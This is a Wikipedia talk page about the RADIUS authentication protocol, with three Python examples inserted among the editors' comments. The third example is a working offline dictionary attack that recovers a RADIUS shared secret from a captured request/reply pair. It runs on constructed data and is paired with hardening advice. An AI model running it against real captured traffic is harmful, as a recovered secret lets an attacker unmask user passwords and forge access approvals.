Talk:RADIUS

"RADIUS" is the name of a protocol, not software

"RADIUS" is not the name of software. "RADIUS" is the name of a protocol defined by RFC 2865 and 2866.--Sgk 11:18, Apr 13, 2004 (UTC)

What is RADIUS?

I don't clearly understand what RADIUS is. What is the advantage of RADIUS compared to the usual thing? Actually, what IS the usual thing? My WLAN DSL router has RADIUS functionality - what does that mean? Will it be used on the connection router - ISP or on the connection home computer - router? Thank you, --Abdull 18:36, 4 Apr 2005 (UTC)

RADIUS functionality built into the modem just means that it can act as a RADIUS server on your network. This is an alternative to running it standalone on a server. RADIUS sits between your network applications and your accounting database, and provides structured operations for common authentication/authorization/accounting tasks. For instance, a Cisco phone switch can be used to bring in and route out phone calls through your network (copper or IP), and can be configured to act as a RADIUS client to your RADIUS server. The first step, authentication, checks the user is who they say they are. In the phone switch example this may be the user entering their PIN. The second step, authorization, checks if they have the right to access the service they have requested. The phone example would at this point check if the user had enough credit for a call to their dialed number, and if so, for how long. Once the session is in progress, optional accounting messages may be sent periodically to update the server on the session's progress. Finally, the RADIUS client will send through a stop message when the session has ended (e.g. the user hangs up their phone or runs out of credit). A typical setup would also include a network-layer service such as ChilliSpot to assign IPs and forward their web traffic to the login page where they enter their PIN, a web server to serve these pages, and an accounting database to store the PINs and the amount of credit on them.
So if you wanted to charge users for access to your public wireless hotspot, then this kind of router could act as a convenient (if not quick and dirty) building block in your architecture.
Straussian 15:07, 2 December 2007 (UTC)
I would like to see a comparison of RADIUS and Kerberos in the article. I don't get why there are two of them? 195.70.32.136 13:08, 2 January 2007 (UTC)

What is RADIUS? Answer

RADIUS is the common Internet protocol for authentication and accounting and is used for: DSL, VoIP, dial-up, hotspots/Wi-Fi, WiMAX, GPRS/UMTS in mobile. It is a centralized server for all Internet networks.

Maybe an example would help. If you have a server on a LAN and a remote access server (modem pool) that you can dial into; software running on the server supporting the radius protocol would allow you to use your server login account information when negotiating across PPP.

The alternative is that the remote access server would have a separate list of PPP authorized users.

RADIUS allows you to maintain a single list of accounts for multiple such devices. A worthy goal.

In this example both the server and the remote access server would need to "speak" RADIUS of course. Ijeffsc 07:15, 26 October 2006 (UTC)

This is from the RADIUS article:
RADIUS uses UDP ports 1812 or 1645 for Authentication and 1813 or 1646 for Accounting. For example, Microsoft RADIUS servers default to the higher ports but Cisco devices default to the lower ports. Funk Software's RADIUS servers also default to the lower ports.
Now, does anyone get the impression that RADIUS doesn't do authorization from the above two statements, Ijeffsc's and the above two lines? On the other hand, this is what I see from searching services running on a Fedora box:
radius-dynauth 3799/tcp # RADIUS Dynamic Authorization
radius-dynauth 3799/udp # RADIUS Dynamic Authorization
Personally, I am not sure RADIUS does authorization. I have been looking at a way of doing it with Radiator without success. They seem to advise running TACACS+ within RADIUS, a really weird setup.
Actually, RADIUS does do authorization. It's just that authorization information is carried by the same packet that does authentication, i.e. authorization uses the same packet as authentication —The preceding unsigned comment was added by 62.128.166.251 (talk) 07:59, 23 January 2007 (UTC).
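The exchange sketched in the phone-switch and modem-pool answers above, with the authorization data riding in the same Access-Accept as the authentication result, as an added runnable example. This is my code, not anything from the article or from any RADIUS implementation. The shared secret, the one-user credential store, the NAS address and the session figures are all constructed for the demo, and the "server" is called in-process instead of over UDP 1812/1813; the packet layout, User-Password hiding and the Authenticator computations follow RFC 2865 and RFC 2866.

```python
import hashlib
import hmac
import os
import struct

# Packet codes (RFC 2865 / RFC 2866) and the attribute types this example uses
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCT_REQUEST, ACCT_RESPONSE = 1, 2, 3, 4, 5
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, SESSION_TIMEOUT = 1, 2, 4, 27
ACCT_STATUS_TYPE, ACCT_SESSION_ID, ACCT_SESSION_TIME = 40, 44, 46
ACCT_START, ACCT_STOP = 1, 2

SHARED_SECRET = b"example-shared-secret"   # assumed; configured on both the NAS and the server
USERS = {b"alice": b"2468"}                 # constructed stand-in for the accounting database (PINs)


def build(code, ident, auth, attrs):
    """Code(1) Identifier(1) Length(2) Authenticator(16), then Type/Length/Value attributes."""
    body = b"".join(struct.pack("!BB", t, 2 + len(v)) + v for t, v in attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + auth + body


def parse(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, pos = [], 20
    while pos < length:
        t, l = pkt[pos], pkt[pos + 1]
        attrs.append((t, pkt[pos + 2:pos + l]))
        pos += l
    return code, ident, pkt[4:20], attrs


def encode_password(password, req_auth, secret):
    """RFC 2865 5.2: pad to 16 octets, XOR each block with MD5(secret + previous cipher block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(padded[i:i + 16], mask))
        out, prev = out + block, block
    return out


def decode_password(hidden, req_auth, secret):
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], mask))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def sign(code, ident, auth_in, attrs, secret):
    """Authenticator = MD5(Code+ID+Length+auth_in+Attributes+Secret). auth_in is the
    Request Authenticator for replies and 16 zero octets for Accounting-Requests."""
    tmp = build(code, ident, auth_in, attrs)
    return tmp[:4] + hashlib.md5(tmp + secret).digest() + tmp[20:]


def verify(pkt, auth_in, secret):
    expected = hashlib.md5(pkt[:4] + auth_in + pkt[20:] + secret).digest()
    return hmac.compare_digest(expected, pkt[4:20])


# ---- server side ----------------------------------------------------------
def server_access(pkt):
    code, ident, req_auth, attrs = parse(pkt)
    a = dict(attrs)
    given = decode_password(a.get(USER_PASSWORD, b""), req_auth, SHARED_SECRET)
    if hmac.compare_digest(USERS.get(a.get(USER_NAME), b"-"), given):
        # authorization travels in the same Access-Accept: here a 600 s call budget
        return sign(ACCESS_ACCEPT, ident, req_auth,
                    [(SESSION_TIMEOUT, struct.pack("!I", 600))], SHARED_SECRET)
    return sign(ACCESS_REJECT, ident, req_auth, [], SHARED_SECRET)


def server_accounting(pkt):
    if not verify(pkt, b"\x00" * 16, SHARED_SECRET):
        return None                              # RFC 2866: silently discard a bad Authenticator
    code, ident, req_auth, attrs = parse(pkt)
    return sign(ACCT_RESPONSE, ident, req_auth, [], SHARED_SECRET)


# ---- NAS (RADIUS client) side ---------------------------------------------
def nas_session(user, password):
    """Authenticate, read the authorization attribute, then send Start and Stop records."""
    req_auth = os.urandom(16)                    # fresh per request: seeds the password mask
    req = build(ACCESS_REQUEST, 1, req_auth, [
        (USER_NAME, user),
        (USER_PASSWORD, encode_password(password, req_auth, SHARED_SECRET)),
        (NAS_IP_ADDRESS, bytes([192, 0, 2, 1]))])
    resp = server_access(req)
    if not verify(resp, req_auth, SHARED_SECRET):
        raise ValueError("Response Authenticator mismatch: reply not made with our secret")
    code, _, _, rattrs = parse(resp)
    if code != ACCESS_ACCEPT:
        return {"accepted": False}
    timeout = struct.unpack("!I", dict(rattrs)[SESSION_TIMEOUT])[0]
    records = [(2, ACCT_START, []), (3, ACCT_STOP, [(ACCT_SESSION_TIME, struct.pack("!I", 42))])]
    acked = 0
    for ident, status, more in records:
        attrs = [(ACCT_STATUS_TYPE, struct.pack("!I", status)),
                 (ACCT_SESSION_ID, b"0001"), (USER_NAME, user)] + more
        acct = sign(ACCT_REQUEST, ident, b"\x00" * 16, attrs, SHARED_SECRET)
        ack = server_accounting(acct)
        acked += bool(ack is not None and verify(ack, acct[4:20], SHARED_SECRET))
    return {"accepted": True, "session_timeout": timeout, "accounting_acked": acked == 2}


if __name__ == "__main__":
    print(nas_session(b"alice", b"2468"))
    print(nas_session(b"alice", b"0000"))
```

The Request Authenticator has to be fresh random bytes for every Access-Request: it seeds the User-Password mask and it is what the NAS checks the reply against, so a reused one lets a captured Access-Accept be replayed. Accounting-Requests carry no password, so their Authenticator is an MD5 over the packet with 16 zero octets in its place, which is why server_accounting verifies before it parses.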

I've removed most of the external links, as they're just links to individual software packages. sjorford →•← 15:35, 15 Apr 2005 (UTC)

...and again. And I will continue to keep removing all these unnecessary external links until and unless someone can convince me otherwise on the talk page. Edit summaries like "do not edit" just don't cut it, I'm afraid. sjorford →•← 21:33, 20 Apr 2005 (UTC)

The external links were there for ages... It is important to link the best RADIUS servers on the market, for example IAS for Microsoft, FreeRADIUS and others. This is important due to the fact that when you search Google for 'radius server' this page is in a high position and should list/talk about RADIUS solutions.

Change the name to Radius Servers.

Why is it important? Wikipedia is an encyclopedia. That means we have an article explaining what RADIUS is, how it works with other technologies and so on. But we're not a shopping catalogue or a review of individual products. The high Google ranking for the page shouldn't affect the content at all.
I've no objection to external links, but they have to add something that enhances the encyclopedia article. I've left one link in because it has extra information in about radius servers in general, but the other links don't have that as far as I can see, they just act as advertising. sjorford →•← 08:43, 23 Apr 2005 (UTC)
RADIUS servers are only one half of the solution. It's better to describe the protocol than just one endpoint.  kgrr talk 17:27, 15 April 2009 (UTC)

Proposal

Instead of fighting, why don't we put the list of RADIUS software on a separate page, like List_of_GIS_software ? Then both can be happy. bluezy

I like this proposal. Lists of things are meant to be self-organizing through categories.  kgrr talk 17:26, 15 April 2009 (UTC)

IP Protocol table

Why is this article using the TCP/IP protocol model? Virtually every discussion about networking uses the OSI model. Using a nonstandard model to discuss which layer RADIUS operates at just adds confusion. — Preceding unsigned comment added by Edtrob (talkcontribs) 01:26, 29 October 2014 (UTC)

Why is there a table of IP protocols on the right hand part of this article? What does a list of IP Protocols have to do with RADIUS?

It's an application layer protocol.  kgrr talk 17:16, 15 April 2009 (UTC)

RADIUS Question

I'm taking a Security+ class right now and one of the questions in our book is this:

Which of the following cannot be used as a RADIUS client?
A) VPN server
B) Wireless access point
C) Network access server
D) Windows workstation

Now, the answer according to the book is D) Windows workstation, which we all agreed with. However, we don't know why. Any input would be nice. camknows

If your Windows workstation had a GINA module that acted as a RADIUS client the answer could be all of the above. WaffleMonster (talk) 05:56, 15 December 2007 (UTC)

Things like this actually do exist and are used for some applications such as guest networks and cyber cafes.

Cyber cafes do it in one of two ways: 1) A centralized NAS server or 2) A NAS server at the venue that may optionally interface to hotel billing, cash register, or other point of sale equipment. But a RADIUS client is not implemented in the laptop or workstation in this case.  kgrr talk

Wireless section?

Is it just me, or does the following not make sense:

Although RADIUS was not initially intended to be a wireless security authentication method, it improves the WEP encryption key standard, in conjunction with other security methods such as EAP-PEAP.

RADIUS does not "improve" on WEP; although auth credentials can be transmitted from the NAS/AP to the auth server using RADIUS, the underlying WEP security is still as vulnerable as it otherwise would be.

Can we delete?

Evilal 00:10, 9 June 2007 (UTC)

Question - why UDP?

It's always baffled me why RADIUS uses UDP and not TCP. UDP seems much better suited for streaming applications where the loss of a few packets is tolerable. A perfect example is streaming live video. But as a developer I can't see how these principles apply to what we're trying to achieve with the RADIUS protocol. Surely the overhead of TCP wouldn't have any scalability or performance issues on fast networks and modern hardware? Someone please enlighten me why they chose UDP for RADIUS. Straussian 15:26, 2 December 2007 (UTC)

See section 2.4 of RFC 2865.  kgrr talk 17:19, 15 April 2009 (UTC)

Why UDP? -- Answer

RADIUS is designed to scale to large-scale deployments with dozens, maybe hundreds of BASs all talking occasionally to a couple of central servers. Given the underlying reliability of modern networks, the overhead of maintaining hundreds of open TCP connections would have been overkill. The alternative (open a connection each time a packet needs to be sent) would also have been inefficient (no point in performing a 3-way handshake for the sake of a single accounting update). On balance, UDP is probably the best choice.

Remember that RADIUS has built-in acknowledgement/retransmission mechanisms to cope with the occasional lost packet.

For a more flexible and robust protocol, see http://en.wikipedia.org/wiki/DIAMETER.

Evilal 08:52, 4 December 2007 (UTC)
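The acknowledgement/retransmission behaviour mentioned in the answer above, as an added simulation. This is my code, not part of the article or of any RADIUS implementation. The loss schedule is a constructed list of per-attempt flags standing in for real UDP loss, and the server keeps only the duplicate-detection state that RFC 2865 section 2.4 describes: a request with the same source, Identifier and Request Authenticator as one already answered gets the cached reply rather than a second trip to the user store.

```python
class RadiusServer:
    """Server side of RFC 2865 2.4 duplicate detection (constructed demo, not a real server)."""

    def __init__(self):
        self.replies = {}       # (src, identifier, request_authenticator) -> reply already sent
        self.backend_hits = 0   # how many times the user store was actually consulted

    def handle(self, src, ident, req_auth, user):
        key = (src, ident, req_auth)
        if key in self.replies:
            return self.replies[key]          # a retransmission: resend, do not re-authenticate
        self.backend_hits += 1
        reply = ("Access-Accept" if user == b"alice" else "Access-Reject", ident)
        self.replies[key] = reply
        return reply


def send_with_retry(server, src, ident, req_auth, user, schedule, max_tries=3):
    """NAS side. schedule is a constructed loss pattern, one (request_arrives, reply_arrives)
    pair per attempt. On timeout the NAS re-sends the identical packet; picking a new
    Identifier or Request Authenticator would make the retry look like a new request."""
    tries = 0
    for req_ok, reply_ok in schedule[:max_tries]:
        tries += 1
        if not req_ok:
            continue                          # lost on the way out; timer fires, retransmit
        reply = server.handle(src, ident, req_auth, user)
        if reply_ok:
            return reply, tries
        # reply lost on the way back: the server already answered, the retry hits its cache
    return None, tries                        # give up (or fail over to a secondary server)


def demo():
    """Reply lost once, request lost once, third attempt succeeds; backend consulted once."""
    server = RadiusServer()
    src, ident, req_auth = ("192.0.2.1", 49152), 42, bytes(range(16))   # constructed NAS
    reply, tries = send_with_retry(server, src, ident, req_auth, b"alice",
                                   [(True, False), (False, False), (True, True)])
    return reply, tries, server.backend_hits


if __name__ == "__main__":
    print(demo())
```

The cache is what keeps a lossy link from turning one login into several authentication attempts against the backend, and it is why RFC 2865 ties the Identifier and Request Authenticator together: the Identifier alone is an 8-bit value that wraps quickly on a busy NAS.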

Another reason is that when RADIUS was designed, it was possible to implement a UDP stack in a single embedded chip, but a TCP stack was more complicated (read: more expensive). This seems rather silly now, but it was a real problem designing cheap devices back then.

You can still find the same reasoning in SIP phones: although SIP can be used both over UDP and TCP, a lot of vendors only implement the UDP part.

--Bluezy (talk) 22:18, 4 December 2007 (UTC)

Bulk Changes

Committed some new text at the start to try and speak to what RADIUS is/does for those who don't have much knowledge of it and its associated soup of TLAs. Think it would be good to axe/move some of the existing text, especially the paragraphs including and immediately following 'Many networks services ('

Some ideas for new sections:

One focusing on each of the popular RADIUS auth protocols PAP,CHAP,MSCHAP,EAP..etc centralizing some scattered information.

A second on popular backend databases SQL, password files, LDAP..etc...in the spirit of whatever common practices there are for managing accounts.

Finally security focused protocol criticisms such as use of MD5/secret key lengths/"Just use IPSec" a security/mitigation section might be helpful.

WaffleMonster (talk) 08:33, 15 December 2007 (UTC)
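To make the "use of MD5 / secret key lengths" criticism above concrete, here is an added example of the offline dictionary attack that RFC 2865 section 8 warns about. This is my code, not from the article or from any RADIUS product. The Response Authenticator is a plain MD5 over the reply plus the shared secret, so anyone holding one captured Access-Request/Access-Accept pair can test candidate secrets without sending anything to the server. The "capture" and the wordlist are constructed inline, the 'cisco123' secret is a placeholder, not a statement about any vendor, and the policy check is my reading of the RFC's "at least 16 octets, as unguessable as possible" advice.

```python
import hashlib
import hmac
import struct


def build(code, ident, auth, attrs):
    """Minimal RADIUS packet encoder: header, Authenticator, Type/Length/Value attributes."""
    body = b"".join(struct.pack("!BB", t, 2 + len(v)) + v for t, v in attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + auth + body


def response_authenticator(reply, req_auth, secret):
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return hashlib.md5(reply[:4] + req_auth + reply[20:] + secret).digest()


def make_capture(secret):
    """Constructed stand-in for a sniffer capture of one Access-Request/Access-Accept pair.
    No User-Password attribute: the attack needs only a reply and its request's Authenticator."""
    req_auth = bytes(range(16))                       # fixed here; a real NAS sends random octets
    request = build(1, 7, req_auth, [(1, b"alice"), (4, bytes([192, 0, 2, 1]))])
    accept = build(2, 7, req_auth, [(27, struct.pack("!I", 600))])
    accept = accept[:4] + response_authenticator(accept, req_auth, secret) + accept[20:]
    return request, accept


WORDLIST = [b"password", b"radius", b"testing123", b"cisco123", b"s3cr3t"]   # constructed


def crack_shared_secret(request, reply, wordlist):
    """Offline guessing: one MD5 per candidate, no packets to the server, no lockout."""
    req_auth = request[4:20]
    for cand in wordlist:
        if hmac.compare_digest(response_authenticator(reply, req_auth, cand), reply[4:20]):
            return cand
    return None


def secret_policy_violations(secret, wordlist=WORDLIST):
    """Reasons a shared secret falls short of RFC 2865's advice (assumed thresholds)."""
    problems = []
    if len(secret) < 16:
        problems.append("shorter than 16 octets")
    if secret.isalpha() or secret.isdigit():
        problems.append("single character class")
    if secret in wordlist:
        problems.append("found in a common wordlist")
    return problems


def demo():
    weak_req, weak_acc = make_capture(b"cisco123")
    strong_secret = bytes.fromhex("8f3a6c1d9e0b47f2c5a1d6e8b3f09c27")   # 16 random-looking octets
    strong_req, strong_acc = make_capture(strong_secret)
    return {
        "weak_recovered": crack_shared_secret(weak_req, weak_acc, WORDLIST),
        "strong_recovered": crack_shared_secret(strong_req, strong_acc, WORDLIST),
        "weak_policy": secret_policy_violations(b"cisco123"),
        "strong_policy": secret_policy_violations(strong_secret),
    }


if __name__ == "__main__":
    print(demo())
```

Once the secret is known, every captured User-Password can be unmasked and Access-Accepts can be forged for the NAS that shares it, which is why the usual hardening is a long random secret per NAS, the Message-Authenticator attribute (RFC 2869) on every packet, and carrying the UDP traffic inside IPsec or RADIUS over TLS (RFC 6614) rather than trusting the MD5 constructions on their own.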

Some of these sections may have some merit. I will be bold and add them this week.  kgrr talk 17:20, 15 April 2009 (UTC)

Cleanup

Over the next few days, I will spend some time to clean up this article. I am planning on adding three figures: one showing a block diagram of RADIUS in an enterprise where dial-up, VPN and Wi-Fi all use the same RADIUS server, a typical protocol stack, and a block diagram of a roaming scenario where there is a proxy RADIUS server communicating with a remote RADIUS server connected by a PKI tunnel. I also will add a section on tools used to troubleshoot RADIUS.  kgrr talk 15:46, 15 April 2009 (UTC)

AAA?

I believe AAA is just a name of a working group, which is a legitimate TLA. For the rest, TLA technobabble should be avoided as culturally inappropriate for enlightened technicians; the effort to find and use real descriptive terms instead of obscurantisms is an indication of the technical maturity of the speaker. In my opinion, that is. Rursus dixit. (mbork3!) 08:55, 13 January 2012 (UTC)

You can find an explanation in the introduction part. Killer queen1 (talk) 21:45, 16 January 2012 (UTC)

AAA - Section refers to NAS and RAS interchangeably

The section on AAA using RADIUS refers to RAS as the requesting server initially, but then changes to NAS as the server being responded to, and then refers again to RAS. Are these interchangeable? — Preceding unsigned comment added by Anuragbatra (talkcontribs) 22:48, 11 May 2012 (UTC)

Capitalisation

Aren't there too many capitalised words in this article?

For example,

"Proxy Chaining", "Authentication, Authorization, and Accounting", "Access Reject", "Access Challenge", "Access Accept", and "RADIUS Codes".

--Mortense (talk) 11:06, 8 November 2019 (UTC)